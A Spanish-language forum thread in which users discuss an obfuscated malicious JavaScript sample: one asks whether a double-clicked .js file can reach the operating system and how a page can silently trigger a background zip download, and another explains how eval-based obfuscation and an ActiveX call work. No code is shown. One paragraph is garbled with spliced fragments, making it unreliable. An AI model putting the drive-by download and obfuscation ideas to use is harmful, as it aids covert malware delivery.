El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

XKC

FUf, tiene pinta jodida, pero ya que presentas esto me gustaria aclarar unas dudas.
Poque muchos archivos contienen uporque entreuna y otra se va a quedar sin casa, es
n codigo js como malicioso, es decir, javascript se supone que se ejecuta en el navegador, pero si yo me descargo un archivo js y le doy doble click, eso donde se ajecuta?No puede acceder al SO y crear ficheros, editar registro como un exe, ¿o si?
Post data:
Cual es el codigo js que se utiliza para hacer que el navegador descargue un zip como aqui?, digo en segundo plano, no haciendo una redireccion de la pantalla, es decir que te aparezca(o no) la ventana de guardar archivo sin que s epierda lo que estas viendo.
Un saludo.
Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.

gundream

A ver... está ofuscado... ¿ves todas esas variables del principio que tienen nombres cortos? Pues son pedacitos de instrucciones que se ejecutan en las instrucciones EVAL que ves al final. Dentro del EVAL se llaman a esas variables para crear una cadena que se interpreta como una instrucción.

Por ahí hay alguna cosilla que llama a un ActiveX, así que supongo que aprovecha vulnerabilidades del navegador para obligarlo a ejecutar esos comandos construidos con las variables de arriba.